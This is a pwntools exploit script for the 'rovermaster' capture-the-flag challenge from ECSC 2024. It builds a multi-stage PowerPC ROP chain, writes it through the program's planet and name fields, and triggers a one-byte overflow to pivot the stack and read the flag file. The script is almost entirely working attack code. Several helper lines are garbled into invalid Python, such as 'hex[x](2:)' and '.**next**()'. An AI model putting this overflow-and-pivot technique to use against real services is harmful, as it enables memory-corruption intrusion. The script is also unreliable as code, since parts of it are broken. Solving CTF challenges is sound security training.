# !/usr/bin/env python
from pwn import *

GDB_OFF = 0x555555554000
IP = 'localhost' if args.LOCAL else 'rovermaster.challs.open.ecsc2024.it'
PORT = 38007
BINARY = './main'
ARGS = []
ENV = {}
GDB = f"""
set follow-fork-mode parent

# b main

# exec cmd

b *0x10022174
b* 0x100b2fb0
c"""

context.binary = exe = ELF(BINARY, checksec=False)
context.aslr = False

linfo = lambda x: log.info(x)
lwarn = lambda x: log.warn(x)
lerror = lambda x: log.error(x)
lprog = lambda x: log.progress(x)

byt = lambda x: x if isinstance(x, bytes) else x.encode() if isinstance(x, str) else repr(x).encode()
phex = lambda x, y='': print(y + hex(x))
lhex = lambda x, y='': linfo(y + hex(x))
pad = lambda x, s=8, v=b'\0', o='r': byt(x).ljust(s, v) if o == 'r' else byt(x).rjust(s, v)
padhex = lambda x, s: pad(hex[x](2:), s, '0', 'l')
upad = lambda x: u64(pad(x))

gelf = lambda elf=None: elf if elf else exe
srh = lambda x, elf=None: gelf(elf).search(byt(x)).**next**()
sasm = lambda x, elf=None: gelf(elf).search(asm(x), executable=True).**next**()
lsrh = lambda x: srh(x, libc)
lasm = lambda x: sasm(x, libc)

cyc = lambda x: cyclic(x)
cfd = lambda x: cyclic_find(x)
cto = lambda x: cyc(cfd(x))

t = None
gt = lambda at=None: at if at else t
sl = lambda x, t=None: gt(t).sendline(byt(x))
se = lambda x, t=None: gt(t).send(byt(x))
sla = lambda x, y, t=None: gt(t).sendlineafter(byt(x), byt(y))
sa = lambda x, y, t=None: gt(t).sendafter(byt(x), byt(y))
ra = lambda t=None: gt(t).recvall()
rl = lambda t=None: gt(t).recvline()
rls = lambda t=None: rl[t](:-1)
re = lambda x, t=None: gt(t).recv(x)
ru = lambda x, t=None: gt(t).recvuntil(byt(x))
it = lambda t=None: gt(t).interactive()
cl = lambda t=None: gt(t).close()

vm = None
def get_target(**kw):
  global vm

  if args.REMOTE:
    # context.log_level = 'debug'
    return remote(IP, PORT)

  if args.LOCAL:
    if args.GDB:
      return gdb.debug([exe.path] + ARGS, env=ENV, gdbscript=GDB, **kw)
    return process([exe.path] + ARGS, env=ENV,**kw)

  from vagd import Shgd, Box # only load vagd if needed
  if not vm:
    vm = Shgd(exe.path, user='root', host='localhost', port=2222, ex=True, fast=True)  # SSH
  if vm.is_new:
    log.info("new vagd instance") # additional setup here
  return vm.start(argv=ARGS, env=ENV, gdbscript=GDB, **kw)

CHOOSE=1
SEND=2
EXEC=3

G_PLT=0
S_PLT=1
G_NA=2
S_NA=3
M_RO=4
F_INF=5

def joke(j, sz=None):
  if sz is None:
    sz = len(j)
  assert sz <= 0x20, 'joke to big'
  sla('Joke size:', sz)
  sla('Joke:', j)

def opt(o):
  sla('Option: ', o)

def choose(idx):
  assert idx < 0xf, 'rover idx to big'
  opt(CHOOSE)
  sla('rover: ', idx)

def send(cmd):
  opt(SEND)
  sla('action: ', cmd)

def exc():
  opt(EXEC)

def set_name(name, sz=None, oob=False):
  if sz is None:
    sz = len(name)
    if oob:
      sz -= 1

  assert sz <= 0x100, 'name to big'
  send(S_NA)
  exc()
  sla('size:', sz)
  if oob:
    sa('name:', name)
  else:
    sla('name:', name)

def set_planet(name, sz=None):
  if sz is None:
    sz = len(name)

  assert sz <= 0x100, 'planet to big'
  send(S_PLT)
  exc()
  sla('size:', sz)
  sla('planet:', name)

t = get_target()

# stack pivot payload for later

PAYLOAD_START = 0x10110116
pivot = flat(
  PAYLOAD_START - 0x78,
  cyclic(0x10),
  0x10000cf8,  # pivot stack to payload
)

joke(pivot)

# first stage open('flag', O_RDONLY)

payload = flat(
  PAYLOAD_START, # r31
  pad(b'flag\0', 0x10), # file to open
  0x10022174, # set r3 r4
  cto('caaa'),
  PAYLOAD_START+8, #r3 (path)
  cyc(cfd('eaaa')-(cfd('caaa')+8)),
  0, #r4 (O_RDONLY)
  cyc(cfd('laab')-(cfd('eaaa')+8)),
  exe.sym.open+0x18
)

# second stage read(3, BUFFER, count)

payload += flat(
  cto('iaaa'),
  PAYLOAD_START+len(payload)+0x80, # r31
  cto('eaaa'),
  0x10022170, # use ctr for jmp (preserve lr)
  cto('waaa'),
  0x100b2fb0, # set r5 to high value (count)
  PAYLOAD_START+len(payload)+0x100, # r31
  cto('eaaa'),
  0x10022170, # set r3 r4
  cto('caaa'),
  3, #r3 (flag fd)
  cyc(cfd('eaaa')-(cfd('caaa')+8)),
  PAYLOAD_START+0xf400, #r4 (buffer)
  cto('caaa'),
  PAYLOAD_START+len(payload)+0x180, # r31
  cyc(cfd('haaa')-(cfd('caaa')+4)),
  0x10000cf8,  # pivot stack
  cyc(0x40-(cfd('haaa')+0xc)),
  exe.sym.read
)

# third stage puts(BUFFER)

payload += flat(
  cto('acba'),
  PAYLOAD_START+len(payload)+0x100, # r31
  cyc(cfd('acha')-(cfd('acba')+8)),
  0x10022170, # set r3 r4 again
  cto('caaa'),
  PAYLOAD_START+0xf400, #r3
  cyc(cfd('eaaa')-(cfd('caaa')+8)),
  0x6fe1be2, #r4
  cto('caaa'),
  exe.sym.puts
)

rop_size = (len(payload)//0x100) + 1

payload = payload + cyclic((0x100*rop_size)-len(payload))

assert len(payload) <= 0x1e00, 'payload to long'

lhex(rop_size, 'rop_size: ')

p = lprog('prepare payload')
for i in range(0, rop_size):
  p.status(f'{i}/{rop_size}')
  if i & 1 == 0:
    choose(i//2)
    set_planet(payload[i*0x100:(i + 1)*0x100])
  else:
    set_name(payload[i*0x100:(i + 1)*0x100])

p.success('start payload')

linfo('one byte BOF')
bof = flat(
  cyclic(0x100),
  p8(0x64)
)

set_name(bof, oob=True)

linfo('pivot stack to payload')
exc()

rl()
linfo('flag: '+ rl().decode())

if args.GDB:
  it()
